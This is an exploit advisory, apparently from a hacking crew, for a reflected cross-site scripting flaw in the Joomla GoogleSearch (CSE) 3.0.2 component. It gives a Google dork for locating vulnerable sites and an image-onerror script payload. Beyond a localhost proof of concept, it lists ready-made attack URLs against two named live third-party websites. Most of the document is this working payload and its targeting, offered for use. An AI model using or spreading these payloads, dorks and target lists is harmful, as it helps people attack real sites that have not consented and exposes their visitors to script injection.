Joomla GoogleSearch (CSE) 3.0.2 Cross Site Scripting

`########################################################################################  
#Exploit title: Joomla Component GoogleSearch (CSE) 3.0.2 - XSS Vulnerability  
#Author: Bet0  
#Twitter: https://twitter.com/Bet0_Shinoda  
#Website: www.mc-crew.or.id  
#Google Dork: inurl:"index.php?option=com_googlesearch_cse"  
#Date: 29 Agustus 2015   
#Vendor Homepage: www.kksou.com  
#Plugins Link: http://extensions.joomla.org/extensions/7023/details  
#Tested on: Mozila Firefox 40.0 and Ubuntu 15.04   
########################################################################################  
  
[+]Piye om Carane (PoC)  
  
1. Go to Columns Search Input The malicious code "><img src=x onerror=prompt(1)>  
  
[+]Sample  
http://127.0.0.1/index.php?option=com_googlesearch_cse&n=30&Itemid=97&cx=005488517870211354079%3Ao9aiibgwgqs&cof=FORID%3A11&ie=ISO-8859-1&q="><img src=x onerror=prompt(1)>&sa=Search&hl=en&safe=active&siteurl=https%3A%2F%2Fwww.google.com  
  
  
[+]Live Target  
http://ufoforce.com/index.php?option=com_googlesearch_cse&n=30&Itemid=97&cx=005488517870211354079%3Ao9aiibgwgqs&cof=FORID%3A11&ie=ISO-8859-1&q=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E&sa=Search&hl=en&safe=active&siteurl=https%3A%2F%2Fwww.google.com  
  
http://www.linuxcnc.org/index.php?option=com_googlesearch_cse&n=30&Itemid=&cx=017093687396734519753%3Ao_92rwvgxxw&cof=FORID%3A9&ie=ISO-8859-1&q=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3E&sa=Search&hl=en&siteurl=http%3A%2F%2Fwww.linuxcnc.org%2F  
  
[+]Matur Suwun:  
#Dek Cia :* kapan kita balikan maneh dek :'( kangen aku karo awakmu  
#Ch0c01d, valcr00t, xr0b0tx, Don Tukulesto, rm -rf, vyc0d, Mr.Doel, Zen Rooney, nemesis, ArrchID *Gae Kabeh Ojo lali Ndang Rabi, moso kalah ambe mas blie :)) *  
#All member NyongDIE, Malang Cyber Crew, Indonesian Coder, Sund4nyM0uz Corporation, Explore Crew, HN-Community  
`